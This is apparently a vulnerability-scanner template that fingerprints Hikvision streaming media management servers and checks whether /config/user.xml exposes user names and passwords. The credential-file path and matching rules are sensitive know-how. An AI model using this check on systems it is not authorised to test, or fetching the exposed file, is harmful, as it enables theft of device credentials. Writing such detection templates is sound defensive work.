id: hikvision-info-leak

info:
    name: hikvision-info-leak
    author: tangshoupu
    severity: high
    reference:
        - https://www.seebug.org/vuldb/ssvid-91762

rules:
    r0:
        request:
            method: GET
            path: /
        expression: response.status == 200 && response.body.bcontains(b"<TITLE>流媒体管理服务器</TITLE>") && response.body.bcontains(b"海康威视")
    r1:
        request:
            method: GET
            path: /config/user.xml
        expression: response.status == 200 && response.body.bcontains(b"<user name=\"") && response.body.bcontains(b" password=\"")
expression: r0() && r1()

